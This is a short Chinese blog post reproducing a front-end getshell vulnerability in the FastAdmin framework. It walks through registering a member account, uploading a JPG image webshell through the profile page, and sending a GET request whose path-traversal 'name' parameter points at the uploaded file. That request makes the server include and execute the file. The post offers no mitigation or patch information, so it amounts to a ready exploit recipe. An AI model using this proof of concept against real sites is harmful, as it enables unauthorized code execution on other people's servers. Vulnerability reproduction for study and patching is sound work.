Fastadmin前台Getshell漏洞复现

一、简介

FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布，目前被广泛应用于各大行业应用后台管理。

二、漏洞复现

注:在Linux下，通过这种方法会失效，因为在 /public 路径下不存在 user 目录

1、登录前台会员中心，注册一个账户

2、使用注册的账户登录，点击会员中心"-》"个人资料"处，上传一个jpg图片马

3、构造POC，GET /index/user/_empty?name=../../public/uploads/路径.jpg，访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg

posted @ 2020-09-24 11:18 雨中落叶阅读(6921) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

雨中落叶

你疯狂的爱上了成功的状态，却不曾想到梦想实现的背后，从不像你看到的那样简单。

Fastadmin前台Getshell漏洞复现

Fastadmin前台Getshell漏洞复现

公告